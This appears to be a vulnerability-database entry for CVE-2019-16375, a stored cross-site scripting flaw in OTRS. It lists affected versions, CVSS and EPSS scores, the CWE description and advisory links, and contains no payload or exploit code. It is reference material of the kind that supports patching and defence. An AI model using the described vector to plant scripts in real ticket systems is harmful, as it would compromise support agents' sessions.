Vulnerability Details : CVE-2019-16375
An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.11, and Community Edition 5.0.x through 5.0.37 and 6.0.x through 6.0.22. An attacker who is logged in as an agent or customer user with appropriate permissions can create a carefully crafted string containing malicious JavaScript code as an article body. This malicious code is executed when an agent composes an answer to the original article.
Vulnerability category: Cross site scripting (XSS)
Products affected by CVE-2019-16375
- Otrs » Otrs » Community EditionVersions from including (>=) 5.0.0 and up to, including, (<=) 5.0.37cpe:2.3:a:otrs:otrs:*:*:*:*:community:*:*:*
- Otrs » Otrs » Community EditionVersions from including (>=) 6.0.0 and up to, including, (<=) 6.0.22cpe:2.3:a:otrs:otrs:*:*:*:*:community:*:*:*
- cpe:2.3:a:otrs:otrs:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2019-16375
0.10%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 40 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2019-16375
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
3.5
|
LOW | AV:N/AC:M/Au:S/C:N/I:P/A:N |
6.8
|
2.9
|
NIST | |
5.4
|
MEDIUM | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
2.3
|
2.7
|
NIST |
CWE ids for CVE-2019-16375
-
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.Assigned by: nvd@nist.gov (Primary)
References for CVE-2019-16375
-
http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00038.html
[security-announce] openSUSE-SU-2020:0551-1: moderate: Recommended updatBroken Link
-
http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00066.html
[security-announce] openSUSE-SU-2020:1475-1: moderate: Recommended updatBroken Link
-
https://community.otrs.com/category/security-advisories-en/
Security Advisories Archive | community.otrs.comVendor Advisory
-
https://otrs.com/release-notes/otrs-security-advisory-2019-13/
OTRS Security Advisory 2019-13 | OTRSRelease Notes;Vendor Advisory
-
https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html
[SECURITY] [DLA 3551-1] otrs2 security update
-
http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00077.html
[security-announce] openSUSE-SU-2020:1509-1: moderate: Recommended updatBroken Link
Jump to